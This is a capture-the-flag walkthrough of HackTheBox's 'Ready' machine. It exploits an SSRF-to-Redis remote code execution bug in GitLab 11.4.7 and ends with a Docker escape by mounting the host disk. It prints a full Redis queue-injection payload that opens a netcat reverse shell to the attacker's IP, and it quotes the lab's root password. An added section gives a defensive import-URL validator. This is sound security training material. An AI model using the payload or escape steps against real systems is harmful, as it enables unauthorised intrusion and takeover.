HackTheBox: (“Ready”) — Walkthrough
Hi People :D
Today we're going to solve the “Ready” machine from HackTheBox, let's GOOOOO :D
TL;DR
— — —
- Ports 5080 and 22 are open.
- Navigate to the website on port 5080; it's running GitLab Community Edition 11.4.7
- After searching for an exploit for this GitLab version, I found an RCE exploit that is explained pretty well in a LiveOverflow video
- By reproducing this bug, I got a shell as the git user, then I found the user flag in the home directory of the dude user
- In the /opt/backup directory, there's a file called gitlab.rb that contains the root password
- After I logged in as root, I found some Docker-specific files, so I realized that I was inside a Docker container
- I used one of the known methods to escape this Docker container and then got the root flag
Enumeration
— — — — — —
Start with Nmap
nmap -A 10.10.10.220
We have two open ports (22 and 5080), so let's navigate to the website on port 5080
Web Enumeration
— — — — — — — —
We have GitLab running on port 5080
First, make an account, then log in with it.
Then navigate directly to the help page. Why?! ... Because most machines run an outdated version of GitLab that has a lot of bugs, and the help page shows the version.
In our case, we have GitLab 11.4.7, which is an outdated version, so let's search for an exploit
Exploitation
— — — — — —
I found This Awesome LiveOverflow Video that explains how to exploit the RCE in this GitLab version
I also found This GitHub repo that contains a PoC payload and a BurpSuite request sample
We just have to follow these steps to get a shell
First, we have to create a project from a git repo by URL:
Home -> New Project -> Import project -> git repo by URL
Then, in the Git repository URL field, paste this line (as shown in the GitHub repo above):
git://[0:0:0:0:0:ffff:127.0.0.1]:6379/test/ssrf.git
Second, open BurpSuite (or any HTTP interceptor) and click Create project
Now we have the required request; send it to Repeater so that we can test the exploit comfortably.
As shown in the PoC and the BurpSuite request sample, we have to paste this payload into the project[import_url] parameter in order to get a shell (DO NOT delete the spaces):
multi
sadd resque:gitlab:queues system_hook_push
lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|nc -e /bin/bash {Your_IP} 1234\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
exec
exec
exec
And we successfully got a shell as git :)
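The bug class behind this chain is an SSRF filter bypass: the import URL smuggles a loopback target past a naive address check by writing it as an IPv4-mapped IPv6 literal ([0:0:0:0:0:ffff:127.0.0.1]), and the server-side fetch then reaches the internal Redis port. As an added example (this editor's code, not GitLab's real implementation; the function names and allow-list policy are assumptions), here is an import-URL validator that unwraps such literals and resolves hostnames before deciding, which is the check a defender would want in any server-side fetch feature:

```python
# Added example: validate a user-supplied repository import URL so that a
# server-side fetch can never be pointed at loopback, private or link-local
# addresses, including the IPv4-mapped IPv6 bypass used in this writeup.
# Policy and names are this editor's assumptions, not GitLab's own code.
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https", "git", "ssh"}  # assumed policy


def _is_internal(ip) -> bool:
    """True for any address a server-side fetch must never reach."""
    # Unwrap ::ffff:a.b.c.d so a loopback IPv4 hidden inside an IPv6
    # literal is judged as the IPv4 address it really is.
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def import_url_allowed(url: str, resolve=socket.getaddrinfo) -> bool:
    """Allow the URL only if every address its host maps to is public.

    `resolve` is injectable so the check can be tested without DNS.
    """
    try:
        parts = urlsplit(url)  # strips the [] around IPv6 literals
    except ValueError:
        return False
    if parts.scheme not in ALLOWED_SCHEMES or not parts.hostname:
        return False
    host = parts.hostname
    try:
        ips = [ipaddress.ip_address(host)]          # literal address
    except ValueError:
        try:                                        # hostname: resolve it
            ips = [ipaddress.ip_address(r[4][0]) for r in resolve(host, None)]
        except (OSError, ValueError):
            return False                            # unresolvable: deny
    return bool(ips) and not any(_is_internal(ip) for ip in ips)
```

Resolving at validation time still leaves DNS rebinding and HTTP redirects to handle; the fetcher itself must re-check every address it actually connects to.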
User Flag
— — — — —
After getting the shell, upgrade it a bit using:
python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=linux
Then move to the /home directory; there's a directory called dude and we are able to access it.
Fortunately, it contains the user flag :D
Root Flag
— — — — —
Let's enumerate the files; maybe we'll find something interesting.
The first place I usually look is the /opt directory, because it holds packages and service files that are not part of the operating system distribution but provided by an independent source. These packages often ship configuration files and backups with hardcoded credentials in them.
As expected, there's a password in the gitlab.rb file inside the /opt/backup directory
Try this password (wW59U!ZKMbG9+*#h) with root, and we successfully switch to the root user
If you notice, we are root but still inside gitlab (root@gitlab).
I immediately suspected that I was in a Docker container, and I confirmed it when I found the Docker-specific files (such as .dockerenv and .dockerinit).
So we need to escape from this Docker container.
I found This Article about the ways to escape from Docker containers; we can escape using the mount method (as shown in the article above)
First, use fdisk -l
to find the target disk; in our case the target is sda2
To mount the host disk, create an empty directory inside another empty directory with:
mkdir -p /firstDir/secondDir
Then mount the host disk using:
mount /dev/sda2 /firstDir/secondDir
You will find the root flag in /firstDir/secondDir/root/root.txt
Note that this only works because the container can see and mount the host's block devices (typically a privileged container); a container run without that access cannot mount /dev/sda2, which is the hardening that would have stopped this step.
Thanks for reading, hope you love this writeup ❤.
You can give me a Respect on my HackTheBox account (if you want :D).